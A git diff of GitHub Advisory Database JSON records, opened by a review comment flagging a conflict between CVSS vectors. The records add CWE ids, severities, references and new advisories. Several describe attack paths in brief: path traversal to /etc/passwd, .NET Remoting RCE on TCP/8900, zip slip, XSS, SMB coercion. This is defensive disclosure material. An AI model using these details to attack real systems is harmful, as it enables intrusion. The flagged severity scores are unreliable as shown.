"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
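Review bot: The CVSS v3 vector added at `"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"` scores CVE-2025-12785 as PR:N, while the existing v4 vector two lines below scores the same issue as PR:H, and the sibling record GHSA-2886-9536-rhhj in this commit carries PR:H in both vectors. The two vectors presumably come from different scoring sources (vendor versus NVD) or one of them is wrong; whichever one feeds `database_specific.severity` (outside this hunk) decides the displayed rating, so the source should be checked before this lands. The `details` text is also byte-identical to that of GHSA-2886-9536-rhhj, so nothing in either record distinguishes CVE-2025-12784 from CVE-2025-12785. The rest of the record lies outside this hunk.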
diff --git a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json
index cc4fc102d8088..c8e47565d98ec 100644
--- a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json
+++ b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-v6c5-9mp4-mwq4",
- "modified": "2026-02-11T15:30:21Z",
+ "modified": "2026-02-13T18:31:23Z",
"published": "2025-11-26T15:34:12Z",
"aliases": [
"CVE-2025-13601"
@@ -47,6 +47,10 @@
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:2072"
},
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2026:2064"
+ },
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:1736"
diff --git a/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json b/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json
index e705d9d130360..16244a5359ebd 100644
--- a/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json
+++ b/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json
@@ -1,13 +1,17 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5wfc-7v23-c2vf",
- "modified": "2025-12-09T21:31:49Z",
+ "modified": "2026-02-13T18:31:23Z",
"published": "2025-12-09T21:31:49Z",
"aliases": [
"CVE-2021-47724"
],
"details": "STVS ProVision 5.9.10 contains a path traversal vulnerability that allows authenticated attackers to access arbitrary files by manipulating the files parameter in the archive download functionality. Attackers can send GET requests to /archive/download with directory traversal sequences to read sensitive system files like /etc/passwd.",
"severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ },
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json
index 7652fb69f6540..a46c72ac4d3be 100644
--- a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json
+++ b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5mc7-p6pj-r3f5",
- "modified": "2026-01-21T00:31:42Z",
+ "modified": "2026-02-13T18:31:23Z",
"published": "2026-01-21T00:31:42Z",
"aliases": [
"CVE-2026-0865"
@@ -43,6 +43,10 @@
"type": "WEB",
"url": "https://github.com/python/cpython/commit/4802b96a2cde58570c24c13ef3289490980961c5"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/python/cpython/commit/66da7bf6fe7b81e3ecc9c0a25bd47d4616c8d1a6"
+ },
{
"type": "WEB",
"url": "https://github.com/python/cpython/commit/e4846a93ac07a8ae9aa18203af0dd13d6e7a6995"
diff --git a/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json b/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json
index a122bc92e7d86..9d3113da8a192 100644
--- a/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json
+++ b/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-jh94-8q48-f3m3",
- "modified": "2026-01-26T15:31:19Z",
+ "modified": "2026-02-13T18:31:23Z",
"published": "2026-01-23T18:31:30Z",
"aliases": [
"CVE-2026-1299"
@@ -47,6 +47,10 @@
"type": "WEB",
"url": "https://github.com/python/cpython/commit/8cdf6204f4ae821f32993f8fc6bad0d318f95f36"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/python/cpython/commit/e417f05ad77a4c30ddc07f99e90fc0cef43e831a"
+ },
{
"type": "WEB",
"url": "https://cve.org/CVERecord?id=CVE-2024-6923"
diff --git a/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json b/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json
index 1faa991ec0136..3ff46cfdcb468 100644
--- a/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json
+++ b/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json
@@ -46,7 +46,8 @@
],
"database_specific": {
"cwe_ids": [
- "CWE-74"
+ "CWE-74",
+ "CWE-89"
],
"severity": "MODERATE",
"github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json b/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json
new file mode 100644
index 0000000000000..c74d239c86fb0
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-224f-wm46-5p4r",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2025-66676"
+ ],
+ "details": "An issue in IObit Unlocker v1.3.0.11 allows attackers to cause a Denial of Service (DoS) via a crafted request.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66676"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cwjchoi01/CVE-2025-66676"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.iobit.com/en/iobit-unlocker.php"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T18:16:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json
index 26994f0e7141f..2eb69b7c705fb 100644
--- a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json
+++ b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json
@@ -25,7 +25,9 @@
}
],
"database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-200"
+ ],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json b/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json
new file mode 100644
index 0000000000000..c40923c22e7bf
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3669-8ww5-g35f",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2025-70094"
+ ],
+ "details": "A cross-site scripting (XSS) vulnerability in the Generate Item Barcode function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Item Category parameter.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70094"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/opensourcepos/opensourcepos/pull/4357"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70094.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.opensourcepos.org"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T16:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json b/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json
index 54661722df369..7acac638a91ea 100644
--- a/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json
+++ b/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3q2x-q945-c5mm",
- "modified": "2026-02-11T15:30:27Z",
+ "modified": "2026-02-13T18:31:24Z",
"published": "2026-02-11T15:30:27Z",
"aliases": [
"CVE-2019-25314"
@@ -38,6 +38,10 @@
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/duplicate-post-persistent-cross-site-scripting"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duplicate-post/yoast-duplicate-post-323-authenticated-admin-stored-cross-site-scripting"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json b/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json
new file mode 100644
index 0000000000000..8da634476cc20
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4gg4-26q8-wv28",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2025-69770"
+ ],
+ "details": "A zip slip vulnerability in the /DesignTools/SkinList.aspx endpoint of MojoPortal CMS v2.9.0.1 allows attackers to execute arbitrary commands via uploading a crafted zip file.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69770"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/i7MEDIA/mojoportal/security"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/kid-tnt/Mojo-check/blob/main/Zipslip%20in%20MojoPortal%20version%202.9.0.1.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.mojoportal.com/mojoportal-2-9-1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T18:16:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json b/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json
new file mode 100644
index 0000000000000..f05c070281e27
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5wr5-vxhh-x7gm",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2026-26221"
+ ],
+ "details": "Hyland OnBase contains an unauthenticated .NET Remoting exposure in the OnBase Workflow Timer Service (Hyland.Core.Workflow.NTService.exe). An attacker who can reach the service can send crafted .NET Remoting requests to default HTTP channel endpoints on TCP/8900 (e.g., TimerServiceAPI.rem and TimerServiceEvents.rem for Workflow) to trigger unsafe object unmarshalling, enabling arbitrary file read/write. By writing attacker-controlled content into web-accessible locations or chaining with other OnBase features, this can lead to remote code execution. The same primitive can be abused by supplying a UNC path to coerce outbound NTLM authentication (SMB coercion) to an attacker-controlled host.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26221"
+ },
+ {
+ "type": "WEB",
+ "url": "https://community.hyland.com/resources/bulletins-and-notices/223223-security-update-onbase-workflow-timer-service-bulletin-ob2025-03"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.hyland.com/en/solutions/products/onbase"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/hyland-onbase-timer-services-unauthenticated-net-remoting-rce"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T16:16:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json b/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json
new file mode 100644
index 0000000000000..4b374e9eea703
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7v9f-f4qv-fcxh",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2025-1790"
+ ],
+ "details": "Local privilege escalation in Genetec Sipelia Plugin. An authenticated low-privileged Windows user could exploit this vulnerability to gain elevated privileges on the affected system.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:H/IR:H/AR:H/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:H/MVI:H/MVA:H/MSC:X/MSI:H/MSA:H/S:P/AU:N/R:X/V:C/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1790"
+ },
+ {
+ "type": "WEB",
+ "url": "https://techdocs.genetec.com/r/en-US/Security-Updates-for-SipeliaTM-2.14"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-250"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T17:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json
index 583c0515f5221..26d18da71a8ff 100644
--- a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json
+++ b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json
@@ -37,7 +37,9 @@
}
],
"database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-377"
+ ],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json
index 71b182c662e59..3fdb1c5373ebf 100644
--- a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json
+++ b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json
@@ -45,7 +45,9 @@
}
],
"database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-22"
+ ],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json b/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json
new file mode 100644
index 0000000000000..566f6f187b641
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cgmm-x5ww-q5cr",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2026-26226"
+ ],
+ "details": "beautiful-mermaid versions prior to 0.1.3 contain an SVG attribute injection issue that can lead to cross-site scripting (XSS) when rendering attacker-controlled Mermaid diagrams. User-controlled values from Mermaid style and classDef directives are interpolated into SVG attribute values without proper escaping, allowing crafted input to break out of an attribute context and inject arbitrary SVG elements/attributes into the rendered output. When the generated SVG is embedded in a web page, this can result in script execution in the context of the embedding origin.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26226"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lukilabs/beautiful-mermaid/pull/8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lukilabs/beautiful-mermaid/releases/tag/v0.1.3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://neo.projectdiscovery.io/share/cec71dc7-a8eb-417e-b8b4-666644796c1e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/beautiful-mermaid-svg-attribute-injection"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T17:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json b/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json
index 2318643dfd18f..bce80abbf7b42 100644
--- a/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json
+++ b/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-cm39-88fp-pv6j",
- "modified": "2026-02-12T00:31:04Z",
+ "modified": "2026-02-13T18:31:24Z",
"published": "2026-02-12T00:31:04Z",
"aliases": [
"CVE-2026-20624"
],
"details": "An injection issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to access sensitive user data.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
"affected": [],
"references": [
{
@@ -28,8 +33,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-863"
+ ],
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:05Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json b/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json
new file mode 100644
index 0000000000000..c9d4b3634317b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fq6p-4h82-858f",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2025-70122"
+ ],
+ "details": "A heap buffer overflow vulnerability in the UPF component of free5GC v4.0.1 allows remote attackers to cause a denial of service via a crafted PFCP Session Modification Request. The issue occurs in the SDFFilterFields.UnmarshalBinary function (sdf-filter.go) when processing a declared length that exceeds the actual buffer capacity, leading to a runtime panic and UPF crash.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70122"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/free5gc/free5gc/issues/746"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T17:16:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json
index 37b01af86dc3f..3ed2ead753663 100644
--- a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json
+++ b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json
@@ -29,7 +29,9 @@
}
],
"database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-200"
+ ],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json b/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json
index 6f87148c28743..109964fac8eab 100644
--- a/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json
+++ b/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-h6jx-x5f4-qmj9",
- "modified": "2026-02-12T00:31:04Z",
+ "modified": "2026-02-13T18:31:24Z",
"published": "2026-02-12T00:31:04Z",
"aliases": [
"CVE-2026-20623"
],
"details": "A permissions issue was addressed by removing the vulnerable code. This issue is fixed in macOS Tahoe 26.3. An app may be able to access protected user data.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
"affected": [],
"references": [
{
@@ -20,8 +25,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:05Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json b/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json
index f2448d2f4681c..6a6a16057b1db 100644
--- a/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json
+++ b/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-h892-rh45-x8jp",
- "modified": "2026-02-13T06:30:48Z",
+ "modified": "2026-02-13T18:31:24Z",
"published": "2026-02-13T06:30:48Z",
"aliases": [
"CVE-2025-15520"
],
"details": "The RegistrationMagic WordPress plugin before 6.0.7.2 checks nonces but not capabilities, allowing for the disclosure of some sensitive data to subscribers and above.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
"affected": [],
"references": [
{
@@ -21,7 +26,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-13T06:16:10Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json b/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json
new file mode 100644
index 0000000000000..85d71bffe0028
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-j98c-62jj-x3h3",
+ "modified": "2026-02-13T18:31:25Z",
+ "published": "2026-02-13T18:31:25Z",
+ "aliases": [
+ "CVE-2025-70123"
+ ],
+ "details": "An improper input validation and protocol compliance vulnerability in free5GC v4.0.1 allows remote attackers to cause a denial of service. The UPF incorrectly accepts a malformed PFCP Association Setup Request, violating 3GPP TS 29.244. This places the UPF in an inconsistent state where a subsequent valid PFCP Session Establishment Request triggers a cascading failure, disrupting the SMF connection and causing service degradation.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70123"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/free5gc/free5gc/issues/745"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T17:16:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json b/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json
index 200deaa254608..3092e58eb79b4 100644
--- a/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json
+++ b/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-jhq4-533p-8p4c",
- "modified": "2026-02-12T00:31:04Z",
+ "modified": "2026-02-13T18:31:24Z",
